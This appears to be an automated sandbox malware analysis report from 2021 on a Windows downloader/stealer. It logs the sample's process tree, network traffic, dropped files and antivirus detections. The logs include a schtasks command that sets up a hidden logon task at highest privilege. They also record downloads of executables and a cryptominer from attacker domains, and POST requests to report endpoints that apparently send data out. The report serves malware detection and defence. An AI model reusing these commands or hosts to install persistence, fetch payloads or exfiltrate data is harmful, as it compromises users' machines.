Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Sept. 7, 2021, 11:56 a.m. | Sept. 7, 2021, 11:59 a.m. |
-
-
-
-
gdgame.exe "C:\Users\test22\AppData\Local\Temp\gdgame.exe" -a
1576
-
-
-
msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH=C:\Users\test22\AppData\Local\Temp\installer.exe SETUPEXEDIR=C:\Users\test22\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630982808 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
2956
-
-
-
-
stats.tmp "C:\Users\test22\AppData\Local\Temp\is-RDMLJ.tmp\stats.tmp" /SL5="$7037C,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
2176-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit
2040-
schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"'
2084
-
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit
2252-
schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"'
1200
-
-
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1236 -
-
rundll32.exe rUNdlL32.eXe "C:\Users\test22\AppData\Local\Temp\axhub.dll",main
1984
-
IP Address | Status | Action |
---|---|---|
104.21.31.210 | Active | Moloch |
172.67.148.61 | Active | Moloch |
172.67.179.248 | Active | Moloch |
104.192.141.1 | Active | Moloch |
104.21.65.45 | Active | Moloch |
104.26.3.60 | Active | Moloch |
117.18.232.200 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.67.186.79 | Active | Moloch |
185.65.135.234 | Active | Moloch |
208.95.112.1 | Active | Moloch |
23.67.53.58 | Active | Moloch |
3.232.36.43 | Active | Moloch |
34.117.59.81 | Active | Moloch |
34.97.69.225 | Active | Moloch |
52.95.148.158 | Active | Moloch |
72.167.225.156 | Active | Moloch |
88.99.66.31 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49171 88.99.66.31:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=iplogger.com | 01:03:e9:82:3a:f4:6d:5a:7f:e9:29:26:08:3c:f4:61:a7:b2:88:bb |
TLSv1 192.168.56.102:49180 88.99.66.31:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=iplogger.com | 01:03:e9:82:3a:f4:6d:5a:7f:e9:29:26:08:3c:f4:61:a7:b2:88:bb |
TLSv1 192.168.56.102:49174 34.117.59.81:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1D4 | CN=ipinfo.io | 9b:8a:7e:73:93:70:47:e8:1f:ef:b1:b9:f4:52:8b:2f:90:2c:85:2e |
TLSv1 192.168.56.102:49192 172.67.148.61:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.boys4dayz.com | 63:06:25:8c:e0:e5:22:17:08:5c:57:74:d1:bf:13:5d:b5:e9:a1:fb |
TLSv1 192.168.56.102:49176 104.26.3.60:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | f5:72:da:40:bf:be:27:7c:72:0c:5c:e2:dd:f4:22:7a:4d:b1:41:14 |
TLSv1 192.168.56.102:49184 104.21.65.45:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 4d:09:7a:e7:f4:eb:aa:0d:0f:42:0e:b4:5e:97:1b:e4:c3:c3:87:e8 |
TLSv1 192.168.56.102:49170 88.99.66.31:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=iplogger.com | 01:03:e9:82:3a:f4:6d:5a:7f:e9:29:26:08:3c:f4:61:a7:b2:88:bb |
TLSv1 192.168.56.102:49187 172.67.186.79:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:d2:a2:92:7c:46:a9:cd:c3:c5:28:a5:f9:58:f1:b1:21:82:30:fa |
TLSv1 192.168.56.102:49211 172.67.179.248:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.upstloans.net | 12:ed:3c:4a:ff:c2:a1:8d:83:7a:48:18:92:32:52:dc:a3:6f:83:f7 |
TLSv1 192.168.56.102:49226 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49232 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49248 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49221 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49222 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49216 104.21.31.210:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.upstloans.net | 12:ed:3c:4a:ff:c2:a1:8d:83:7a:48:18:92:32:52:dc:a3:6f:83:f7 |
TLSv1 192.168.56.102:49224 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49218 172.67.179.248:443 |
None | None | None |
TLSv1 192.168.56.102:49228 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49223 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49238 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49225 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49239 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49233 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49242 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49234 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49237 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49245 3.232.36.43:443 |
None | None | None |
TLS 1.2 192.168.56.102:49227 185.65.135.234:58899 |
C=US, O=Let's Encrypt, CN=R3 | CN=sanctam.net | 38:bc:f2:94:62:8a:02:9e:90:64:d5:0f:bc:00:83:12:36:86:2c:2a |
TLSv1 192.168.56.102:49229 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49230 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49231 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49235 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49236 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49220 172.67.179.248:443 |
None | None | None |
TLS 1.2 192.168.56.102:49244 104.192.141.1:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA | unknown=Private Organization, unknown=US, unknown=Delaware, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., OU=Bitbucket, CN=bitbucket.org | 4e:6a:4c:3b:82:15:ef:df:97:38:5e:50:ef:b9:86:42:84:3b:89:f0 |
TLSv1 192.168.56.102:49219 3.232.36.43:443 |
C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=installeranalytics.com | 46:bc:d9:e4:bb:04:00:59:99:29:4c:3b:84:9e:82:d6:3c:62:8d:2b |
TLSv1 192.168.56.102:49240 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49241 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49243 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49247 3.232.36.43:443 |
None | None | None |
TLSv1 192.168.56.102:49246 3.232.36.43:443 |
None | None | None |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | c:\program files (x86)\Google\Chrome\application\chrome.exe |
section | CODE |
section | DATA |
section | BSS |
packer | BobSoft Mini Delphi -> BoB / BobSoft |
suspicious_features | HTTP version 1.0 used | suspicious_request | HEAD http://2551889d-a2db-4908-a9a2-6b0fab0a7a78.s3.eu-west-2.amazonaws.com/SmartPDF/SmartPDF.exe | ||||||
suspicious_features | HTTP version 1.0 used | suspicious_request | GET http://2551889d-a2db-4908-a9a2-6b0fab0a7a78.s3.eu-west-2.amazonaws.com/SmartPDF/SmartPDF.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://jom.diregame.live/userf/2203/gdgame.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://d.dirdgame.live/userf/2203/3cc0e0be954dc849581f9ff1817647de.exe | ||||||
suspicious_features | POST method with no referer header | suspicious_request | POST https://a.upstloans.net/report7.4.php | ||||||
suspicious_features | POST method with no referer header | suspicious_request | POST https://b.upstloans.net/report7.4.php | ||||||
suspicious_features | POST method with no referer header | suspicious_request | POST https://collect.installeranalytics.com/ | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://bitbucket.org/Sanctam/sanctam/raw/6886fdce0f0a2bb81eece107d8acbd20b349ca2f/includes/ethminer |
request | GET http://ipinfo.io/country |
request | GET http://ipinfo.io/ip |
request | HEAD http://2551889d-a2db-4908-a9a2-6b0fab0a7a78.s3.eu-west-2.amazonaws.com/SmartPDF/SmartPDF.exe |
request | GET http://2551889d-a2db-4908-a9a2-6b0fab0a7a78.s3.eu-west-2.amazonaws.com/SmartPDF/SmartPDF.exe |
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
request | GET http://ip-api.com/json/?fields=8198 |
request | GET http://crl.identrust.com/DSTROOTCAX3CRL.crl |
request | GET https://iplis.ru/1S2Qs7 |
request | GET https://iplis.ru/favicon.ico |
request | GET https://ipinfo.io/country |
request | GET https://ipqualityscore.com/api/json/ip/gp65l99h87k3l1g0owh8fr8v99dme/175.208.134.150 |
request | GET https://iplogger.com/1ESxy7 |
request | GET https://jom.diregame.live/userf/2203/gdgame.exe |
request | GET https://d.dirdgame.live/userf/2203/3cc0e0be954dc849581f9ff1817647de.exe |
request | POST https://a.upstloans.net/report7.4.php |
request | POST https://b.upstloans.net/report7.4.php |
request | POST https://collect.installeranalytics.com/ |
request | GET https://bitbucket.org/Sanctam/sanctam/raw/6886fdce0f0a2bb81eece107d8acbd20b349ca2f/includes/ethminer |
request | POST https://a.upstloans.net/report7.4.php |
request | POST https://b.upstloans.net/report7.4.php |
request | POST https://collect.installeranalytics.com/ |
domain | ipinfo.io |
domain | ip-api.com |
file | C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe |
file | C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll |
file | C:\Users\test22\AppData\Local\Temp\api-ms-win-core-namedpipe-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\is-CHG20.tmp\_isetup\_shfoldr.dll |
file | C:\Users\test22\AppData\Local\Temp\is-CHG20.tmp\Setup.exe |
file | C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi |
file | C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe |
file | C:\Users\test22\AppData\Local\Temp\installer.exe |
file | C:\Users\test22\AppData\Local\Temp\axhub.dll |
file | C:\Users\test22\AppData\Local\Temp\api-ms-win-core-string-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\gdgame.exe |
file | C:\Users\test22\AppData\Local\Temp\is-CHG20.tmp\itdownload.dll |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk |
cmdline | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit |
cmdline | schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' |
cmdline | cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit |
file | C:\Program Files (x86)\SmartPDF\SmartPDF\Visit.url |
file | C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe |
file | C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe |
file | C:\Users\test22\AppData\Local\Temp\gdgame.exe |
file | C:\Users\test22\AppData\Local\Temp\installer.exe |
file | C:\Users\test22\AppData\Local\Temp\is-CHG20.tmp\Setup.exe |
file | C:\Users\test22\AppData\Local\Temp\MSI7D.tmp |
file | C:\Users\test22\AppData\Local\Temp\INA5D.tmp |
file | C:\Users\test22\AppData\Local\Temp\MSIBC.tmp |
file | C:\Users\test22\AppData\Local\Temp\gdgame.exe |
file | C:\Users\test22\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll |
file | C:\Users\test22\AppData\Local\Temp\is-CHG20.tmp\_isetup\_shfoldr.dll |
file | C:\Users\test22\AppData\Local\Temp\is-CHG20.tmp\itdownload.dll |
file | C:\Users\test22\AppData\Local\Temp\api-ms-win-core-namedpipe-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\api-ms-win-core-string-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\is-RDMLJ.tmp\stats.tmp |
file | C:\Users\test22\AppData\Local\Temp\axhub.dll |
file | C:\Users\test22\AppData\Local\Temp\installer.exe |
process | rundll32.exe |
cmdline | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit |
cmdline | schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' |
cmdline | cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit |
buffer | Buffer with sha1: c3b8f89b5346818dc3a5dae9a352bcd9a6961274 |
buffer | Buffer with sha1: 26816dea6c5274208e07cfee13108976a7d8ba5c |
buffer | Buffer with sha1: 24f732917bba7f8e06359ceb122abb309a583511 |
buffer | Buffer with sha1: 8d19fdbfd57b54b5abd82c58ad8594fde99c1c2c |
buffer | Buffer with sha1: 0674cccae8519c229d9a2c70ac9a24ded875df96 |
buffer | Buffer with sha1: 231ac9daa6f34accc96e48c916281a5b93844a6d |
buffer | Buffer with sha1: 704d00610eda305f30fb0e5b8cc340360028c06c |
buffer | Buffer with sha1: 0a15086ccb936897cbd272b579c6bed354800227 |
buffer | Buffer with sha1: ea9a48fd57fe97a8563d6acc1746a20e50d24a3a |
host | 117.18.232.200 |
cmdline | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit |
cmdline | schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' |
cmdline | cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\services32.exe"' & exit |
file | C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe:Zone.Identifier |
DrWeb | Trojan.PWS.Stealer.29129 |
FireEye | Generic.mg.5578b9ee762d5257 |
Malwarebytes | Malware.AI.2457169706 |
CrowdStrike | win/malicious_confidence_60% (W) |
BitDefenderTheta | Gen:NN.ZemsilF.34126.am0@a0vo38o |
ESET-NOD32 | multiple detections |
APEX | Malicious |
Kaspersky | UDS:Trojan-Downloader.Win32.Adload |
Avast | Win32:RATX-gen [Trj] |
Tencent | Win32.Trojan-downloader.Agent.Svho |
McAfee-GW-Edition | GenericRXED-YZ!6AF7E6AFE782 |
Sophos | Generic ML PUA (PUA) |
Avira | HEUR/AGEN.1137912 |
Microsoft | Trojan:Win32/Sabsik.TE.B!ml |
Cynet | Malicious (score: 100) |
McAfee | Artemis!5578B9EE762D |
Cylance | Unsafe |
SentinelOne | Static AI - Malicious PE |
eGambit | Unsafe.AI_Score_99% |
AVG | Win32:RATX-gen [Trj] |
Cybereason | malicious.e890a5 |
MaxSecure | Trojan-Ransom.Win32.Crypmod.zfq |